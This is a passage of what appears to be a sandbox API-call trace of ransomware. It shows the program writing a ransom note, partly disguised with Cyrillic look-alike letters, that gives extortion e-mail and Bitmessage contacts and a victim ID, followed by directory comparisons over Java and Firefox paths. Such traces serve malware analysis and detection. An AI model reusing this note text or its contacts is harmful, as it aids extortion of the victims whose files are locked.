w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nà ðý\x1dLúj\x8d\x94$á6]jIÑ\x80Cãa âcN", lpUsedDefaultChar=0x0) returned 8717 [0206.387] WriteFile (in: hFile=0x2cc, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0206.390] CloseHandle (hObject=0x2cc) returned 1 [0206.390] Sleep (dwMilliseconds=0x3e8) [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 1 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 2 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 1 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 2 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 1 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 3 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 3 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 2 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 1 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 2 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 1 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 2 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 2 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount2=43) returned 1 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount2=43) returned 1 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount2=43) returned 3 [0207.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount2=80) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount2=80) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, 